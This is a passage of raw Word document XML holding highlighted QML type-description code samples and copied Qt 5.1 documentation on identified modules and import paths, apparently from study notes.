    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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FC1DCE"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C1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">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name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"animations"</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type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"QQuickAbstractAnimation"</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defaults to false, whether this property is read only</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isReadonly</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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defaults to false, whether the type of this property was a pointer in C++</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isPointer</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// defaults to false: whether the type actually is a QQmlListProperty&lt;type&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00192E15"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192E15">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>isList</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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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defaults to 0: the meta object revision that introduced this property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>revision</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00FC1DCE"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C1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">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Property</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name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"loops"</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type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"int"</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Property</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name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"name"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type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"string"</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Property</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name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"loopsEnum"</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type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"Loops"</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FC1DCE"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FC1DCE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1DCE">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name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"Loops"</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values</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"Infinite"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r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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"OnceOnly"</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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Signal and Method work the same way. The inner Parameter</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declarations also support the isReadonly, isPointer and isList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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// attributes which mean the same as for Property</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Method</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name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"restart"</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Signal</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name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"started"</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revision</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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Signal</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name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"runningChanged"</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Parameter</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type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"bool"</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2C2AE0"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2C2AE0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Parameter</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name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"foo"</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type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"bool"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00192E15"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C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00192E15" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE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w:t>
      </w:r>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="00192E15" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192E15">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F762C" w:rsidRPr="00192E15" w:rsidRDefault="007F762C" w:rsidP="007F762C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00192E15" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId304" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00192E15">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-identifiedmodules.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="_Toc483000610"/>
      <w:bookmarkStart w:id="370" w:name="_Toc483003627"/>
      <w:bookmarkStart w:id="371" w:name="_Toc483603963"/>
      <w:bookmarkStart w:id="372" w:name="_Toc483605183"/>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Identified Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
      <w:bookmarkEnd w:id="370"/>
      <w:bookmarkEnd w:id="371"/>
      <w:bookmarkEnd w:id="372"/>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified modules are modules that are </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>installed and identifiable to the QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by a URI in the form of a dotted identifier string, which should be specified by the module in its</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file. This enables such modules to be imported with a unique identifier that remains the same no matter where the module is located on the local file system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When importing an identified module, an unquoted identifier is used, with a mandatory version number:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69F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A69FE">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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Style w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> com</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nokia</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mymodule </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified modules </w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be installed into the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId305" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="00C472B3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import path</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in order to be found by the QML engine.</w:t>
      </w:r>
    </w:p>
